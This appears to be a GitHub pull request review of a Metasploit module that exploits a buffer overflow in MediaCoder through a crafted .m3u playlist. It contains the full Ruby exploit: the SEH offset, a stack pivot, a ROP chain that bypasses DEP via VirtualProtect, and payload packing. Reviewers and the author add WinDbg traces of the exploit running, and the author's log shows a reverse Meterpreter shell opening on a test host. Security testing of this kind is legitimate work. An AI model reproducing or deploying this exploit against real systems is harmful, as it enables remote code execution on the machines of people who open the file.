Added MediaCoder exploit module #2081

Merged
merged 7 commits into from
Jul 12, 2013
Changes from 2 commits
123 changes: 123 additions & 0 deletions modules/exploits/windows/fileformat/mediacoder_m3u.rb
@@ -0,0 +1,123 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Seh
Contributor

Is this mixin used? If it isn't used, the include should be deleted.

Contributor Author

Of course, I missed that one. Will be removed on next commit.


def initialize(info = {})
super(update_info(info,
'Name' => 'MediaCoder .M3U Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in MediaCoder 0.8.23. The vulnerability
occurs when adding an .m3u, allowing arbitrary code execution under the context
of the user. DEP bypass via ROP is supported on Windows 7, since the MediaCoder
runs with DEP. This module has been tested successfully on MediaCoder 0.8.23.5530
over Windows XP SP3 and Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' =>
[
'metacom', # Vulnerability discovery and PoC
'modpr0be <modpr0be[at]spentera.com>' # Metasploit module
Contributor

A comma is needed at the end of the entry.

Contributor Author

Strange, msftidy doesn't complain about it. Will add it on next commit.

Contributor

msftidy doesn't check this. But if you run msfconsole, you will see a complaint though :-)

'otoy <otoy[at]spentera.com>' # Metasploit module
],
'References' =>
[
[ 'OSVDB', '94522' ],
[ 'EDB', '26403' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh'
},
'Platform' => 'win',
'Payload' =>
{
'Space' => 1200,
'BadChars' => "\x00\x5c\x40\x0d\x0a",
'DisableNops' => true,
'StackAdjustment' => -3500,
},
'Targets' =>
[
[ 'MediaCoder 0.8.23.5530 / Windows XP SP3 / Windows 7 SP1',
Contributor

  • Testing with MediaCoder-0.8.23.5530.exe: doesn't work, doesn't crash either.
  • Testing with MediaCoder-0.8.22.5525.exe: crashes but doesn't work.

Generated test case:

msf exploit(mediacoder_m3u) > show options

Module options (exploit/windows/fileformat/mediacoder_m3u):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.m3u          no        The file name.


Exploit target:

   Id  Name
   --  ----
   0   MediaCoder 0.8.23.5530 / Windows XP SP3 / Windows 7 SP1


msf exploit(mediacoder_m3u) > set payload windows/exec 
payload => windows/exec
msf exploit(mediacoder_m3u) > set CMD calc.exe
CMD => calc.exe
msf exploit(mediacoder_m3u) > rexploit
[*] Reloading module...

[+] msf.m3u stored at /.msf4/local/msf.m3u

  • Crash:
(ec8.330): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for C:\Program Files\MediaCoder\mediacoder.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\MediaCoder\mediacoder.exe
eax=000000fe ebx=7734ad60 ecx=0797b808 edx=f87b47f8 esi=005308c8 edi=000f00ac
eip=0042daf3 esp=0012f090 ebp=0012f1f4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210202
mediacoder+0x2daf3:
0042daf3 88040a          mov     byte ptr [edx+ecx],al      ds:0023:00130000=41
0:000> !exchain
0012f3f4: *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\postproc-52.dll - 
postproc_52+14435 (6afd4435)
Invalid exception stack at 1f3706c9

  • Getting EIP:
0:000> !exchain
0012f3f4: *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\postproc-52.dll - 
postproc_52+14435 (6afd4435)
Invalid exception stack at 1f3706c9
0:000> bp 0x6afd4435
0:000> g
Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=6afd4435 edx=77cc71cd esi=00000000 edi=00000000
eip=6afd4435 esp=0012eb58 ebp=0012eb78 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
postproc_52+0x14435:
6afd4435 81c4ac070000    add     esp,7ACh
  • Executing the stackpivot until the ret:
eax=00000000 ebx=00000000 ecx=6afd4435 edx=77cc71cd esi=00000000 edi=00000000
eip=6afd4435 esp=0012eb58 ebp=0012eb78 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
postproc_52+0x14435:
6afd4435 81c4ac070000    add     esp,7ACh
0:000> t
eax=00000000 ebx=00000000 ecx=6afd4435 edx=77cc71cd esi=00000000 edi=00000000
eip=6afd443b esp=0012f304 ebp=0012eb78 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443b:
6afd443b 5b              pop     ebx
0:000> t
eax=00000000 ebx=dc05a759 ecx=6afd4435 edx=77cc71cd esi=00000000 edi=00000000
eip=6afd443c esp=0012f308 ebp=0012eb78 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443c:
6afd443c 5e              pop     esi
0:000> t
eax=00000000 ebx=dc05a759 ecx=6afd4435 edx=77cc71cd esi=d24ee576 edi=00000000
eip=6afd443d esp=0012f30c ebp=0012eb78 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443d:
6afd443d 5f              pop     edi
0:000> t
eax=00000000 ebx=dc05a759 ecx=6afd4435 edx=77cc71cd esi=d24ee576 edi=18a26cec
eip=6afd443e esp=0012f310 ebp=0012eb78 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443e:
6afd443e 5d              pop     ebp
0:000> t
eax=00000000 ebx=dc05a759 ecx=6afd4435 edx=77cc71cd esi=d24ee576 edi=18a26cec
eip=6afd443f esp=0012f314 ebp=ad31736a iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443f:
6afd443f c3              ret
  • The stack at the stackpivot's ret:
eax=00000000 ebx=dc05a759 ecx=6afd4435 edx=77cc71cd esi=d24ee576 edi=18a26cec
eip=6afd443f esp=0012f314 ebp=ad31736a iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443f:
6afd443f c3              ret
0:000> dd /c1 esp
0012f314  5de29993
0012f318  5fb9d72c
0012f31c  bd821ff1
0012f320  7aaa1222
0012f324  f92b2044
0012f328  4218abda
0012f32c  a76aa3cf
0012f330  83d36f84
0012f334  cc5fbabf
0012f338  51a86dea
0012f33c  85a51ec5
0012f340  4a55d641
0012f344  c13dd08a
0012f348  fc97282e
0012f34c  db2923b9
0012f350  8e1a2cae
0012f354  19fdcda6
0012f358  6d93c249
0012f35c  13cad546
0012f360  05bb4a23
0012f364  87968c30
0012f368  18420f0c
0012f36c  beda55c4
0012f370  50be2c1b
0012f374  a6f02bce
0012f378  6aa8f1b4
0012f37c  da5aff8c
0012f380  bd3ee016
0012f384  9b8f49c2
0012f388  2e07cbab
0012f38c  98d768b0
0012f390  e9e19506

  • Finally crash when ret into 5de29993
eax=00000000 ebx=dc05a759 ecx=6afd4435 edx=77cc71cd esi=d24ee576 edi=18a26cec
eip=5de29993 esp=0012f318 ebp=ad31736a iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
5de29993 ??              ???

So:

  • Looks like the MediaCoder version in the target name isn't accurate. Shouldn't be 0.8.23.5530 but 0.8.22.5525. Is it a typo?
  • ESP after the stackpivot doesn't point to the rop chain, alignment problem?

Contributor Author

Hmm, strange. I can confirm that this works for me from 0.8.22.5525 to 0.8.23.5530. Both tested across a VM and a physical box.

MediaCoder 0.8.22.5525 - 0.8.23.5530 on Windows 7 SP1 (Physical Box)

(1218.be4): Break instruction exception - code 80000003 (first chance)
eax=7ff9e000 ebx=00000000 ecx=00000000 edx=76e9f17d esi=00000000 edi=00000000
eip=76e3410c esp=06b1ff5c ebp=06b1ff88 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!DbgBreakPoint:
76e3410c cc              int     3
0:029> g
(1218.1618): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000093 ebx=7577ad60 ecx=04d34c88 edx=fb3fb378 esi=005308c8 edi=000307d0
eip=0042daf3 esp=0012f090 ebp=0012f1f4 iopl=0         nv up ei ng nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210282
*** WARNING: Unable to verify checksum for C:\Program Files\MediaCoder\mediacoder.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\MediaCoder\mediacoder.exe
mediacoder+0x2daf3:
0042daf3 88040a          mov     byte ptr [edx+ecx],al      ds:0023:00130000=41
0:000> !exchain
0012f3f4: *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\postproc-52.dll - 
postproc_52+14435 (6afd4435)
Invalid exception stack at 1b765fa5
0:000> bp 0x6afd4435
0:000> g
Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=6afd4435 edx=76e471ad esi=00000000 edi=00000000
eip=6afd4435 esp=0012eca8 ebp=0012ecc8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
postproc_52+0x14435:
6afd4435 81c4ac070000    add     esp,7ACh
0:000> t
eax=00000000 ebx=00000000 ecx=6afd4435 edx=76e471ad esi=00000000 edi=00000000
eip=6afd443b esp=0012f454 ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443b:
6afd443b 5b              pop     ebx
*** WARNING: Unable to verify checksum for C:\Program Files\MediaCoder\jpeg.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\jpeg.dll - 
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\libiconv-2.dll - 
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\avutil-52.dll - 
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\swscale-2.dll - 
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76e471ad esi=00000000 edi=00000000
eip=6afd443c esp=0012f458 ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443c:
6afd443c 5e              pop     esi
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76e471ad esi=6ab16202 edi=00000000
eip=6afd443d esp=0012f45c ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443d:
6afd443d 5f              pop     edi
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76e471ad esi=6ab16202 edi=6ab16202
eip=6afd443e esp=0012f460 ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443e:
6afd443e 5d              pop     ebp
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76e471ad esi=6ab16202 edi=6ab16202
eip=6afd443f esp=0012f464 ebp=6ab16202 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443f:
6afd443f c3              ret
0:000> dd /c1 esp
0012f464  6ab16202
0012f468  6ab16202
0012f46c  6ab16202
0012f470  6ab16202
0012f474  6ab16202
0012f478  6ab16202
0012f47c  6ab16202
0012f480  6ab16202
0012f484  6ab16202
0012f488  100482ff
0012f48c  ffffffc0
0012f490  7a69494a
0012f494  66d9d9ba
0012f498  6ab2241d
0012f49c  44716254
0012f4a0  44716254
0012f4a4  44716254
0012f4a8  44716254
0012f4ac  44716254
0012f4b0  44716254
0012f4b4  44716254
0012f4b8  44716254
0012f4bc  44716254
0012f4c0  44716254
0012f4c4  44716254
0012f4c8  44716254
0012f4cc  44716254
0012f4d0  44716254
0012f4d4  44716254
0012f4d8  1004a8ee
0012f4dc  6ab561b0
0012f4e0  66d9feee

in handler:

msf exploit(handler) > exploit 

[*] Started reverse handler on 10.10.10.10:443 
[*] Starting the payload handler...
[*] Sending stage (751104 bytes) to 10.10.10.11
[*] Meterpreter session 1 opened (10.10.10.10:443 -> 10.10.10.11:1934) at 2013-07-09 02:01:29 +0700

meterpreter > run checkvm
[*] Checking if target is a Virtual Machine .....
[*] It appears to be physical host.
meterpreter > quit

Contributor

Hmm, not working for me on Win 7 SP1 either. (windows/exec payload):

0042daf3 88040a          mov     byte ptr [edx+ecx],al      ds:0023:00130000=41
0:000> !exchain
0012f3f4: *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\postproc-52.dll - 
postproc_52+14435 (6afd4435)
Invalid exception stack at 1636203a
0:000> bp 6afd4435
0:000> g
Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=6afd4435 edx=77ba71cd esi=00000000 edi=00000000
eip=6afd4435 esp=0012eb58 ebp=0012eb78 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
postproc_52+0x14435:
6afd4435 81c4ac070000    add     esp,7ACh
0:000> p
eax=00000000 ebx=00000000 ecx=6afd4435 edx=77ba71cd esi=00000000 edi=00000000
eip=6afd443b esp=0012f304 ebp=0012eb78 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443b:
6afd443b 5b              pop     ebx
0:000> p
eax=00000000 ebx=9592979f ecx=6afd4435 edx=77ba71cd esi=00000000 edi=00000000
eip=6afd443c esp=0012f308 ebp=0012eb78 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443c:
6afd443c 5e              pop     esi
0:000> p
eax=00000000 ebx=9592979f ecx=6afd4435 edx=77ba71cd esi=2442c65a edi=00000000
eip=6afd443d esp=0012f30c ebp=0012eb78 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443d:
6afd443d 5f              pop     edi
0:000> p
eax=00000000 ebx=9592979f ecx=6afd4435 edx=77ba71cd esi=2442c65a edi=e4f88e0c
eip=6afd443e esp=0012f310 ebp=0012eb78 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443e:
6afd443e 5d              pop     ebp
0:000> p
eax=00000000 ebx=9592979f ecx=6afd4435 edx=77ba71cd esi=2442c65a edi=e4f88e0c
eip=6afd443f esp=0012f314 ebp=597a7252 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443f:
6afd443f c3              ret
0:000> p
eax=00000000 ebx=9592979f ecx=6afd4435 edx=77ba71cd esi=2442c65a edi=e4f88e0c
eip=c9e42ce2 esp=0012f318 ebp=597a7252 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
c9e42ce2 ??              ???

Contributor Author

Strange, works for me with windows/exec payload too.

(88c.10a4): Break instruction exception - code 80000003 (first chance)
eax=7ffdb000 ebx=00000000 ecx=00000000 edx=76e9f17d esi=00000000 edi=00000000
eip=76e3410c esp=02ccff5c ebp=02ccff88 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!DbgBreakPoint:
76e3410c cc              int     3
0:028> g
(88c.1404): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=000000bd ebx=7577ad60 ecx=04e4d968 edx=fb2e2698 esi=005308c8 edi=000f05c0
eip=0042daf3 esp=0012f090 ebp=0012f1f4 iopl=0         nv up ei ng nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210286
*** WARNING: Unable to verify checksum for C:\Program Files\MediaCoder\mediacoder.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\MediaCoder\mediacoder.exe
mediacoder+0x2daf3:
0042daf3 88040a          mov     byte ptr [edx+ecx],al      ds:0023:00130000=41
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\libiconv-2.dll - 
0:000> !exdhain
No export exdhain found
0:000> !exchain
0012f3f4: *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\postproc-52.dll - 
postproc_52+14435 (6afd4435)
Invalid exception stack at e82d1026
0:000> bp 0x6afd4435
0:000> g
Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=6afd4435 edx=76e471ad esi=00000000 edi=00000000
eip=6afd4435 esp=0012eca8 ebp=0012ecc8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
postproc_52+0x14435:
6afd4435 81c4ac070000    add     esp,7ACh
0:000> t
eax=00000000 ebx=00000000 ecx=6afd4435 edx=76e471ad esi=00000000 edi=00000000
eip=6afd443b esp=0012f454 ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443b:
6afd443b 5b              pop     ebx
*** WARNING: Unable to verify checksum for C:\Program Files\MediaCoder\jpeg.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\jpeg.dll - 
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\avutil-52.dll - 
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\swscale-2.dll - 
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76e471ad esi=00000000 edi=00000000
eip=6afd443c esp=0012f458 ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443c:
6afd443c 5e              pop     esi
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76e471ad esi=6ab16202 edi=00000000
eip=6afd443d esp=0012f45c ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443d:
6afd443d 5f              pop     edi
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76e471ad esi=6ab16202 edi=6ab16202
eip=6afd443e esp=0012f460 ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443e:
6afd443e 5d              pop     ebp
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76e471ad esi=6ab16202 edi=6ab16202
eip=6afd443f esp=0012f464 ebp=6ab16202 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443f:
6afd443f c3              ret
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76e471ad esi=6ab16202 edi=6ab16202
eip=6ab16202 esp=0012f468 ebp=6ab16202 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
swscale_2!sws_get_class+0xf002:
6ab16202 c3              ret
0:000> dd /c1 esp
0012f464  6ab16202
0012f468  6ab16202
0012f46c  6ab16202
0012f470  6ab16202
0012f474  6ab16202
0012f478  6ab16202
0012f47c  6ab16202
0012f480  6ab16202
0012f484  6ab16202
0012f488  100482ff
0012f48c  ffffffc0
0012f490  6970504f
0012f494  66d9d9ba
0012f498  6ab2241d
0012f49c  7a784c49
0012f4a0  7a784c49
0012f4a4  7a784c49
0012f4a8  7a784c49
0012f4ac  7a784c49
0012f4b0  7a784c49
0012f4b4  7a784c49
0012f4b8  7a784c49
0012f4bc  7a784c49
0012f4c0  7a784c49
0012f4c4  7a784c49
0012f4c8  7a784c49
0012f4cc  7a784c49
0012f4d0  7a784c49
0012f4d4  7a784c49
0012f4d8  1004cc03
0012f4dc  6ab561b0
0012f4e0  66d9feee

I've tested it with 0.8.22.5525 and 0.8.23.5530:

0:000> lmv m mediacoder
start    end        module name
00400000 005c7000   mediacoder C (no symbols)           
    Loaded symbol image file: C:\Program Files\MediaCoder\mediacoder.exe
    Image path: C:\Program Files\MediaCoder\mediacoder.exe
    Image name: mediacoder.exe
    Timestamp:        Mon Jun 17 23:30:07 2013 (51BF398F)
    CheckSum:         00000000
    ImageSize:        001C7000
    File version:     0.8.22.0
    Product version:  0.8.22.0
    File flags:       8 (Mask 1F) Private
    File OS:          4 Unknown Win32
    File type:        0.0 Unknown
    File date:        00000000.00000000
    Translations:     0409.04b0
    CompanyName:      Broad Intelligence
    ProductName:      MediaCoder
    InternalName:     mediacoder
    OriginalFilename: MediaCoder.exe
    ProductVersion:   0, 8, 22, 5525
    FileVersion:      0, 8, 22, 5525
    FileDescription:  MediaCoder
    LegalCopyright:   (C)2005-2013 Developed by Stanley Huang All Rights Reserved
    LegalTrademarks:  MediaCoder
    Comments:         http://www.mediacoderhq.com

{
'Ret' => 0x6afd4435, # stack pivot (add esp,7ac;pop pop pop pop ret)
Contributor

Ideally you want to print which DLL this address belongs to, better documentation :-)

Contributor Author

Noted.

'Offset' => 849,
'Max' => 5000
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Jun 24, 2013',
'DefaultTarget' => 0))

register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']),
], self.class)

end

def junk(n=1)
return [rand_text_alpha(4).unpack("L")[0]] * n
Contributor

Why is the random text repeated n times instead of generating different junk by calling rand_text_alpha(4).unpack("L")[0] n times? That would make the exploit's junk code more random when n > 1.

end

def nops(rop=false, n=1)
Contributor

Isn't this redundant with Msf::Exploit#make_nops?

Contributor

No, it isn't; it allows ROP-compatible nops, which make_nops doesn't. But this function should use make_nops when rop is false. The problem is with the semantics: when asking for 1 nop with rop == false, he is actually trying to do make_nops(4).

return rop ? [0x6ab21799] * n : [0x90909090] * n
Contributor

I guess this gadget (ret gadget at 0x6ab21799? ) is target specific (MediaCoder 0.8.23.5530 in this case). If it's the case, should be on the target metadata.

Contributor Author

Yes, you're correct. I'll change it to 0x6ab16202 from swscale-2.dll; that would be universal, I think.

end

def exploit

rop_gadgets =
[
nops(true,35), # ROP NOP
0x100482ff, # POP EAX # POP EBP # RETN
0xffffffc0, # negate will become 0x00000040
junk,
0x66d9d9ba, # NEG EAX # RETN
0x6ab2241d, # XCHG EAX,EDX # ADD ESP,2C # POP EBP # POP EDI # POP ESI # POP EBX # RETN
junk(15), # reserve more junk for add esp,2c
0x1004a8ee, # POP ECX # RETN
0x6ab561b0, # ptr to &VirtualProtect()
0x66d9feee, # MOV EAX,DWORD PTR DS:[ECX] # RETN
0x6ab19780, # XCHG EAX,ESI # RETN
0x66d929f5, # POP EAX # POP EBX # RETN
0xfffffcc0, # negate will become 0x0000033f
junk,
0x6ab3c65a, # NEG EAX # RETN
0x1004cc03, # POP ECX # RETN
0xffffffff, #
0x660166e9, # INC ECX # SUB AL,0EB # RETN
0x66d8ae48, # XCHG ECX,EBX # RETN
0x1005f6e4, # ADD EBX,EAX # OR EAX,3000000 # RETN
Contributor

Which DLL is this? Looks like this ROP chain uses multiple DLLs?

Contributor Author

Noted. Will add all rop DLL info.

0x6ab3d688, # POP ECX # RETN
0x6ab4ead0, # Writable address
0x100444e3, # POP EDI # RETN
nops(true), # ROP NOP
Contributor

Why use a nops instead of make_nops?

Contributor

Because of ROP compatible nops, which aren't supported by make_nops.

Contributor

A ROP NOP is typically an address to a RET instruction. The make_nops() function generates something that replaces 0x90. Two different things.

0x10048377, # POP EAX # POP EBP # RETN
nops, # Regular NOPs
Contributor

Are these nops really needed?

0x6ab01c06, # PUSH ESP# RETN
0x6ab28dda, # PUSHAD # RETN
].flatten.pack("V*")

sploit = "http://"
sploit << rand_text(target['Offset'])
sploit << [target.ret].pack('V')
sploit << rop_gadgets
sploit << make_nops(16)
sploit << payload.encoded
sploit << rand_text(target['Max']-sploit.length)

file_create(sploit)
end
end
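Review bot: the target entry records only `'Ret' => 0x6afd4435` plus `Offset`/`Max`, while the chain in `exploit` hardcodes gadgets from several distinct address ranges (the `0x6afd....` pivot, which the debugger output attributes to postproc-52.dll, and gadgets at `0x1004....`, `0x66d9....` and `0x6ab3....`), so nothing in the metadata tells a reader or a future tester which modules, at which versions, must be loaded unrebased for the chain to hold; put the DLL name in each gadget comment and in the target name, and move the literal ROP NOP `0x6ab21799` inside `nops` into per-target data next to `'Ret'`. Two smaller points: `include Msf::Exploit::Seh` is never used by anything in the module body and should be dropped, and the `'Author'` array lacks the comma after the `'modpr0be <modpr0be[at]spentera.com>'` entry, so Ruby will refuse to parse the file when it is loaded (the inline thread already notes msfconsole complains). Finally, `junk(n)` computes one random DWORD and repeats it `n` times, so `junk(15)` is fifteen copies of a single value rather than fifteen independent ones; `Array.new(n) { rand_text_alpha(4).unpack("L")[0] }` gives the varied padding the helper's name implies.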